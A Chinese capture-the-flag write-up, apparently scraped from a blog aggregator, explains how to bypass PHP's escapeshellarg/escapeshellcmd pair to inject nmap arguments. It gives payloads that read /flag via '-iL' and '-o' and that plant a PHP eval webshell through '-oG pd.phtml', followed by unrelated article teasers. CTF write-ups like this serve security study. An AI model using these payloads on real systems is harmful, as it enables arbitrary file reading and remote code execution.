news 2026/3/14 6:28:09

[网鼎杯 2020 朱雀组]Nmap 1

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[网鼎杯 2020 朱雀组]Nmap 1

Nmap 相关参数

-iL 读取文件内容,以文件内容作为搜索目标
-o 输出到文件
举例

nmap -iL ip_target.txt -o result.txt

扫描ip_target.txt内包含的ip地址,输出扫描结果至result.txt
读取文件结果

# Nmap 6.47 scan initiated Fri Dec 24 06:48:23 2021 as: nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/a9950 -iL /flag -o 22' 127.0.0.1\ Failed to resolve "flag{c5e95c66-f441-496b-ac27-699ea43d5c32}". WARNING: No targets were specified, so 0 hosts scanned. # Nmap done at Fri Dec 24 06:48:23 2021 -- 0 IP addresses (0 hosts up) scanned in 0.11 seconds

会提示搜索内容失败,然后会写出来内容是啥,从而实现任意文件读取。

escapeshell

分为excapeshellarg()和escapeshellcmd()两个函数

escapeshellarg()

escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数,保证其作为参数的安全性。


用转义符转义所有单引号,然后用单引号包裹,如

123' aa

经过escapeshellarg,先转义单引号

123\' aa

再用单引号包裹

123'\'' aa

最后,escapeshellarg会将整个字符串用单引号包裹,让字符串变成这样

'123'\'' aa'

escapeshellcmd()

escapeshellcmd - 把字符串中可能欺骗shell命令的字符转义, 用以保证送到system函数或者exec函数的字符串是安全的。


可以看到,不光这些字符,转义符本身还有落单的引号也会被转义。
这个时候,我们把传入escapeshellarg的字符串拿过来,在经过这个函数的处理。

'123'\'' aa'

转义后

'123'\\'' aa\'

因为转义符被转义,最后的引号便落单,逃逸了出去。这个时候,被输入的字符串不再被当成单个参数处理(不再有引号包裹), 即逃出了这两个函数。

题目

输入127.0.0.1后如此回显

结合题目nmap

猜测将命令插在nmap命令中

127.0.0.1 -iL / flag -o 111

报错了,这里看wp得知要绕过

换用pyload

127.0.0.1' -iL /flag -o 111

这里要查看111'文件才行

具体

https://www.cnblogs.com/AikN/p/15727575.html

这里还可以写木马进去

' <?= @eval($_POST["pd"]);?> -oG pd.phtml '

写进去访问,连接蚁剑

https://www.cnblogs.com/buchuo/p/13614498.html

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/13 23:18:31

欧陆直流调速器650-43135020-BF1P00-A0怎么调试

针对欧陆直流调速器650-43135020-BF1P00-A0的调试&#xff0c;可参考以下通用调试步骤&#xff0c;这些步骤基于欧陆直流调速器的常见调试流程整理&#xff0c;适用于多数型号&#xff0c;包括您提到的型号&#xff1a;一、调试前准备确认设备连接&#xff1a;确保调速器与电机…

作者头像 李华
网站建设 2026/3/8 3:58:02

Obsidian图像工具包:终极图片管理插件完整指南

Obsidian图像工具包&#xff1a;终极图片管理插件完整指南 【免费下载链接】obsidian-image-toolkit An Obsidian plugin for viewing an image. 项目地址: https://gitcode.com/gh_mirrors/ob/obsidian-image-toolkit Obsidian图像工具包是一个专为Obsidian用户设计的强…

作者头像 李华
网站建设 2026/3/6 20:48:07

ApiTestEngine终极指南:一键搞定API自动化测试

ApiTestEngine终极指南&#xff1a;一键搞定API自动化测试 【免费下载链接】httprunner 项目地址: https://gitcode.com/gh_mirrors/ap/ApiTestEngine 在当今快速迭代的软件开发环境中&#xff0c;API接口测试已成为保证产品质量的关键环节。ApiTestEngine作为一款开源…

作者头像 李华
网站建设 2026/3/11 5:32:48

Ghost-Downloader-3多线程下载器:AI智能加速的完整使用指南

还在为下载速度慢而烦恼吗&#xff1f;Ghost-Downloader-3作为新一代跨平台多线程下载器&#xff0c;通过AI智能加速技术彻底改变了传统下载体验。这款基于PyQt/PySide框架开发的工具不仅具备IDM级别的智能分块下载能力&#xff0c;还支持无需文件合并的流畅操作。 【免费下载链…

作者头像 李华
网站建设 2026/3/14 0:59:01

Subnautica Nitrox多人联机模组:5个步骤开启你的团队深海冒险

Subnautica Nitrox多人联机模组&#xff1a;5个步骤开启你的团队深海冒险 【免费下载链接】Nitrox An open-source, multiplayer modification for the game Subnautica. 项目地址: https://gitcode.com/gh_mirrors/ni/Nitrox 想象一下&#xff0c;在神秘的4546B行星上&…

作者头像 李华
网站建设 2026/3/10 6:46:24

Qwen-Image文本渲染进阶指南:7个实用技巧让文字完美呈现

Qwen-Image文本渲染进阶指南&#xff1a;7个实用技巧让文字完美呈现 【免费下载链接】Qwen-Image 我们隆重推出 Qwen-Image&#xff0c;这是通义千问系列中的图像生成基础模型&#xff0c;在复杂文本渲染和精准图像编辑方面取得重大突破。 项目地址: https://ai.gitcode.com/…

作者头像 李华